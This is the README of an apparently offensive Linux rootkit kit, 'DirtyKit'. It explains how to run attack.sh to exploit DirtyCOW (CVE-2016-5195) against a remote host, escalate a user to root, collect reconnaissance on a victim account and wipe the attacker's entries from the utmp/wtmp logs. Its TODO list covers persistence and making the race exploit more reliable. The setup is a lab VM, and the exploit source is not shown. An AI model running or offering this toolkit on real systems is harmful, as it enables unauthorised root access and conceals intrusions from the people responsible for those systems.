## DirtyKit

RootKit that contains a unified sequence of routines to perform an attack to a Linux host with kernel version 2.x - 4.x <= 4.8.3.
The main stages developed here are for the post-exploitation phase; that is, reconnaisance and the cleaning of (system) activity logs.
The exploit stage (the first stages of the [attack.sh](./attack.sh) script) uses the DirtyCOW vulnerability (see [here](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195)), 

This kit has been tested with a virtual machine (with VirtualBox), which is a fresh Ubuntu 12.04, and with an OpenSSH server running.
Specifically, the only thing that the VM needs after a fresh install, is:
```bash
# apt-get update && apt-get upgrade -y
# apt-get install -y openssh-server
# useradd -m -G sudo -s /bin/bash victim
# useradd -m -s /bin/bash vagrant
```
Then we are set for the following.


<!--- attack routine -->
Assuming that:
* `RHOST` : 192.168.56.101
* `LHOST` : 192.168.56.1

where `RHOST` is the virtual machine, and `LHOST` is the host from which this attack is made from; then the privilege-scalation can be done with:
```bash
./attack.sh -dirt ./DirtyCode -rip 192.168.56.101 -ru vagrant -vu victim -lh 192.168.56.1
```

The meaning of the options above are:
* `-dirt` : directory that contains code to be compiled/run locally in `RHOST`.
* `-rip`  : remote ip-address of `RHOST`.
* `-ru`   : username of the user to scalate privileges.
* `-vu`   : username of the user whom we'll collect recon info from.
* `-lh`   : ip-address of `LHOST`.


<!--- restore privileges -->
---
Restore normal privileges:
```bash
./unroot.sh -bckp ./DirtyCode/bckp_passwd/passwd_bckp -rip 192.168.56.101 -ru vagrant -lh 192.168.56.1
```

The meaning of the above options are:
* `-bckp` : backup of the original `/etc/passwd` that was collected during the execution of [attack.sh](./attack.sh).
* `-rip`  : ip-address of `RHOST`
* `-ru`   : username of the current privileged-user.
* `-lh`   : ip-address of `LHOST`; we need it to filter the entries (in the `utmp/wtmp` logs) that we want to erase.



<!--- general remarks -->
---
## General Remarks

* Note that the Cython code in [log_cleaner/pyutmp](log_cleaner/pyutmp) has to be compiled inside a host with linux kernel with version 2.x - 4.x <= 4.8.3, by doing:
```bash
cd log_cleaner/pyutmp
make clean
make cython
```

* we need the ssh-public-key of `vagrant` user to be appended in the file `/home/vagrant/.ssh/authorized_keys` of the machine `RHOST`. This is so that `ssh` doesn't prompt for password during execution of `attack.sh`. Note that during the time that the user is privilege-scalated, this public key won't be useful.




---
## TODO:

- [ ] merge some upload procedures in `attack.sh`.

- [ ] script to check locally in `RHOST` if logs were cleaned succecssfully right after execution of [./log_cleaner/CleanBinaryLogs.py](./log_cleaner/CleanBinaryLogs.py).

- [ ] modify the C exploit so that we don't need to re-login to execute the persistence stage.

- [ ] handle the rsync password prompt automatically with `os.execv`? (see [./funcs.py](./funcs.py)).

- [ ] verify that UID=0 before proceeding (but right after trying the persistence stage); otherwise abort && clear all. This can happen in case the C exploit takes longer than the 10 sec. "hardcoded" in the bash scripts. My experience is that in aprox. 1 of 30 tests, the condition race was effective inside the 10. sec interval.

- [ ] run a parallel thread during the executing of the C exploit to check whether UID=0 already (e.g. with `id vagrant`), and in that moment kill the exploit process. In this case, it's unnecessary to wait for the fixed 10 sec.

- [ ] specify password in bash arguments.

- [ ] set a Docker container as an "attack platform"? e.g. for MAC-spoofing.

- [ ] how to enter the ssh-password programatically, for `rsync`; see the [./funcs.py](./funcs.py) library (enters the password for ssh logins).

<!--- EOF -->
